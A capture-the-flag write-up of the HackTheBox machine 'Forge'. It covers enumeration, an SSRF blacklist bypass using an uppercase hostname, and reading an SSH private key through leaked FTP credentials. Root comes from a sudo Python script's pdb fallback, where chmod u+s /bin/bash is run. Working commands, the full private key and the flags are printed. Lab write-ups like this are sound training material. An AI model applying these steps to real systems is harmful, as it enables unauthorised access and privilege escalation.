Scribd
Upload
112 views8 pages

Write Up

Uploaded by

viky patni
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
112 views8 pages

Write Up

Uploaded by

viky patni
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Forge

Nmap

➜ Forge nmap -sV -sC -T3 10.10.11.111 -oN nmap/scan.nmap


Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-12 17:20 +0530
Nmap scan report for 10.10.11.111
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
| 256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_ 256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://forge.htb
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.36 seconds
➜ Forge

vhost enum

ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u
http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10

➜ Forge ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u


http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10

/'___\ /'___\ /'___\


/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.3.1-dev
________________________________________________

:: Method : GET
:: URL : http://forge.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/shubs-
subdomains.txt
:: Header : Host: FUZZ.forge.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response lines: 10
________________________________________________

admin [Status: 200, Size: 27, Words: 4, Lines: 2, Duration:


763ms]
:: Progress: [484699/484699] :: Job [1/1] :: 909 req/sec :: Duration:
[0:11:28] :: Errors: 0 ::
➜ Forge

port 80 is open
there's a subdomain called admin
found a vhost called forge.htb ( when we visit to the port 80 it gives redirect )
we cant access admin subdomain its localhost only

if we go to /uploads endpoint in forge.htb we can see interesting option to upload files


via a link

if we try to access localhost from here we gets blacklisted domian


same for the admin.forge.htb
but we can easily bypass this by using admin.forge.htb in all caps

http://ADMIN.FORGE.HTB/

so after doing so we gets a link and if we curl that and view the content in that link we
notice an interesting endpoint called announcements

<!DOCTYPE html>
<html>
<head>
<title>Admin Portal</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a
href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a>
</h1>
</nav>
</header>
<br><br><br><br>
<br><br><br><br>
<center><h1>Welcome Admins!</h1></center>
</body>
</html>

so lets view the content of that endpoint

http://ADMIN.FORGE.HTB/announcements

<!DOCTYPE html>
<html>
<head>
<title>Announcements</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css"
href="/static/css/announcements.css">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a
href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a>
</h1>
</nav>
</header>
<br><br><br>
<ul>
<li>An internal ftp server has been setup with credentials as
user:heightofsecurity123!</li>
<li>The /upload endpoint now supports ftp, ftps, http and https
protocols for uploading from url.</li>
<li>The /upload endpoint has been configured for easy scripting of
uploads, and for uploading an image, one can simply pass a url with ?
u=&lt;url&gt;.</li>
</ul>
</body>
</html>

and we have interesting stuff

An internal ftp server has been setup with credentials as


user:heightofsecurity123!
The /upload endpoint now supports ftp, ftps, http and https protocols for
uploading from url.
The /upload endpoint has been configured for easy scripting of uploads, and for
uploading an image, one can simply pass a url with ?u=.

lets try to access ftp first by passing the ftp url in get param to the admin vhost

http://ADMIN.FORGE.HTB/upload?u=ftp://user:[email protected]

and we can see the content of ftp

drwxr-xr-x 3 1000 1000 4096 Aug 04 19:23 snap


-rw-r----- 1 0 1000 33 Sep 08 08:13 user.txt

so this must be the home dir for the user so i checked the id_rsa key and it worked
http://ADMIN.FORGE.HTB/upload?
u=ftp://user:[email protected]/.ssh/id_rsa

and we gets the key

-----BEGIN OPENSSH PRIVATE KEY-----


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
shlLupso7WoS0AAAAKdXNlckBmb3JnZQE=
-----END OPENSSH PRIVATE KEY-----

for now we only have one username which us user we found this from the ftp so lets
try ssh with this username

ssh -i user.key [email protected]

after ssh in we can see that we can run a script as root

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User user may run the following commands on forge:


(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py
user@forge:~$

and the content of the script are

#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', port))
sock.listen(1)
print(f'Listening on localhost:{port}')
(clientsock, addr) = sock.accept()
clientsock.send(b'Enter the secret passsword: ')
if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
clientsock.send(b'Wrong password!\n')
else:
clientsock.send(b'Welcome admin!\n')
while True:
clientsock.send(b'\nWhat do you wanna do: \n')
clientsock.send(b'[1] View processes\n')
clientsock.send(b'[2] View free memory\n')
clientsock.send(b'[3] View listening sockets\n')
clientsock.send(b'[4] Quit\n')
option = int(clientsock.recv(1024).strip())
if option == 1:
clientsock.send(subprocess.getoutput('ps aux').encode())
elif option == 2:
clientsock.send(subprocess.getoutput('df').encode())
elif option == 3:
clientsock.send(subprocess.getoutput('ss -lnt').encode())
elif option == 4:
clientsock.send(b'Bye\n')
break
except Exception as e:
print(e)
pdb.post_mortem(e.__traceback__)
finally:
quit()

so if you go though the script we can see there's a try catch block and interestingly if
an exception happens we can see it opens pdb

if you dont know pdb is python debugger

so how can we exploit this ? basically we need to arise an exception so if you check
the if statement they dont handle else call so if we pass something other than 1  4 it
should arise an exception so run the script as root and nc to the port from another
terminal ( ssh again and nc to that port )

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py


Listening on localhost:42512

nc localhost 42512

and enter the password

secretadminpassword
now enter something invalid

user@forge:~$ nc localhost 17089


Enter the secret passsword: secretadminpassword
Welcome admin!

What do you wanna do:


[1] View processes
[2] View free memory
[3] View listening sockets
[4] Quit
hopeyoulikethewriteup

and since they dont handle this input this arise an exception and because of that it will
open pdb

except Exception as e:
print(e)
pdb.post_mortem(e.__traceback__)

so after we have pdb well we can execute any python command so import os and then
set suid to /bin/bash so that you be root easily

(Pdb) import os
(Pdb) os.system('chmod u+s /bin/bash')

and you can see suid is set to /bin/bash

user@forge:~$ ls -la /bin/bash


-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
user@forge:~$

now get root and enjoy!

/bin/bash -p

bash-5.0# cd /root
bash-5.0# cat root.txt
eb2b840fca52fc3658cc011e4995f4af
bash-5.0#

You might also like